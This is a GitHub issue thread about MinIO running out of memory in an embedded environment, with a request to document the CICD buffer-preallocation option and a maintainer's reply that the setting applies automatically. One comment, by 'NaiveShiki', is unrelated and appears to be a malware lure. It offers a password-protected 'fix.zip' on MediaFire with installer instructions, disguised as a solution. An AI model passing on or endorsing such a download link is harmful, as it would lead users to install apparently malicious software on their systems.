### ISSUE TITLE
Documentation Update for CICD Option

### ISSUE THREAD

**Issue by Tri-Yaj** [minio/minio#20329]
**Is your feature request related to a problem? Please describe.**
Running in a 64bit embedded environment with limited memory and Minio Pod goes into OOM. 

**Describe the solution you'd like**
We have considered enabling CICD Mode and would appreciate if either the cicd option introduced in https://github.com/minio/minio/pull/18846 regarding preallocation of memory be documented formally. Or if we can make 
`n - Maximum number of reusable buffers per node at any given point in time` be configurable.

**Comment by NaiveShiki** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by harshavardhana** [comment]
if you have memory < 32GiB it is automatically applied. You are just not using the right MinIO release.
